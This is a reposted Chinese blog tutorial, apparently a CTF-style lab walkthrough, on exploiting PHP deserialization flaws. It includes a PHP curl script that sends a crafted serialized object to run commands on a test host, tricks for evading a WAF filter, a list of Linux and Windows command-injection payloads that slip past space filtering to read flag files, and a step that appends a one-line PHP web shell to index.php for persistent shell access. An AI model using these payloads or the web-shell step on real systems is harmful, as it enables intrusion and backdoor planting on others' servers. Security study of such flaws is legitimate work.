加入收藏 | 设为首页 | 会员中心 | 我要投稿 辽源站长网 (https://www.0437zz.com/)- 云专线、云连接、智能数据、边缘计算、数据安全!
当前位置: 首页 > 运营中心 > 建站资源 > 策划 > 正文

PHP反序列化漏洞简介及相关技巧小结

发布时间:2019-08-12 15:30:31 所属栏目:策划 来源:xiaopan233
导读:要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。 php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。

通过urldecode进行对%00进行解码

  1. <?php  
  2. $curl = curl_init();  
  3. curl_setopt($curl,CURLOPT_URL,'http://192.168.27.144/?first=doller&a=var=give%26bbb=me%26ccc=flag');  
  4. curl_setopt($curl,CURLOPT_POST, 1);  
  5. $n = urldecode('%00');  
  6. $o = 'O:4:"come":2:{s:12:"'.$n.'come'.$n.'method";s:5:"echos";s:10:"'.$n.'come'.$n.'args";a:1:{i:0;s:3:"&ls";}}';  
  7. curl_setopt($curl,CURLOPT_POSTFIELDS, ['come'=>$o]);  
  8. curl_exec($curl);  
  9. curl_close($curl);  
  10. ?> 

不过有更快的方法。。。直接通过postman的urlencode/urldecode即可。因为0×00也就是url编码中的%00。所以url编码一下就完事。

PHP反序列化漏洞简介及相关技巧小结

要用%00包裹住类名,不能包多了也不能包少了,虽然%00也算一个字符,但是Php序列化的时候已经帮我们算好了,所以不需要修改,或者说,我们之前的那个长度值就是错的。。。

选中%00,右键,选择decode即可。

结果:

PHP反序列化漏洞简介及相关技巧小结

我们再发送,有response了,

PHP反序列化漏洞简介及相关技巧小结

发现有flag.txt。由于我是windows环境,读取文件使用type命令。

type命令格式:type文件路径

修改payload。

PHP反序列化漏洞简介及相关技巧小结

发现无回显

PHP反序列化漏洞简介及相关技巧小结

命令是对的,是因为刚刚我们忽略的waf函数在作怪。刚刚提到wakup时将每个args变量拿去在waf函数中洗了个澡。过滤内容为:

PHP反序列化漏洞简介及相关技巧小结

flag这个字符串被替换为空,可以通过双写flag来绕过:flflagag

不过在第一个正则中过滤了空格就有点难受了,总所周知系统命令都是要打个空格才能添加参数的,过滤了空格怎么破?

思来想去后,发现windows没有人提供资料,但是linux下有很多。

绕过方法:

  1. !! (最好一开始就先用这个,执行上一条命令,也许有奇效。。)  
  2. cat${IFS}flag.txt  
  3. cat$IFS$9flag.txt  
  4. cat<flag.txt  
  5. cat<>flag.txt  
  6. {cat,flag.txt}  
  7. KG=$’x20flag.txt’&&cat$KG (x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 

随便用一个(linux环境下):

PHP反序列化漏洞简介及相关技巧小结

windows环境下的话时我突发奇想随便试出来的。适用性不是很广,也就type这个命令能用用。。

  1. type.flag.txt  
  2. type,flag.txt  
  3. echo,123456 

PHP反序列化漏洞简介及相关技巧小结

echo的话这个如果脑洞大点可以通过echo >>的方式将一句话追加到php文件末尾,达到getShell的目的。不过这样子如果该php文件很规范的用了?>结尾就莫得,如果没有那么规范,没用?>结尾就可以成功。

示例:

  1. echo,@system($_GET['cmd']);>>index.php 

PHP反序列化漏洞简介及相关技巧小结

然后就可以通过新的后门来getshell了。

(编辑:辽源站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

推荐文章
    热点阅读